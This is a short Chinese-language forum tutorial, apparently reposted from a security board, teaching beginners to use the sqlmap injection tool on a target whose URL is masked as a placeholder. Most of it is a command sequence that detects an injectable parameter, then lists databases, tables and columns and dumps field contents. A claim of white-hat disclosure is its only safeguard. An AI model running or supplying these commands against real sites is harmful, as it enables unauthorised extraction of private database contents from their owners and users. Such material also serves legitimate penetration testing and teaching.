###############################################################################################################标题：新手使用SQLMAP
####作者：tusdasa翼
####环境介绍：Python 2.7 sqlmap
#### 新手入门 大牛饶命
#######################################################################################################
正文
###############################################################################################################
以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转
SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面
1. 使用快捷方式启动2. 现做如下假设 1. 已经安装Python2.7 并已经添加了环境变量 2. 已经下载了SQLMAP 3. 会使用cmd命令行 我知道你们都是大牛3. 打开要在sqlmap的目录里
注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了
[AppleScript] 纯文本查看 复制代码
1 **************************************
[AppleScript] 纯文本查看 复制代码
1 sqlmap.py -u "注入点" //会判断数据库类型，服务操作系统、脚本类型 前后有双引号

03服务器 / asp.net / ms sql 2008
[AppleScript] 纯文本查看 复制代码
1 sqlmap.py -u "注入点" --dbs //列数据库 按上键

[AppleScript] 纯文本查看 复制代码
1 sqlmap.py -u "注入点" -D 数据库名 --tables //列出表名

[AppleScript] 纯文本查看 复制代码
1 sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns //猜字段

[AppleScript] 纯文本查看 复制代码
1 sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容

###############################################################################################################END
来源文章：http://bbs.secbox.cn/thread-640-1-1.html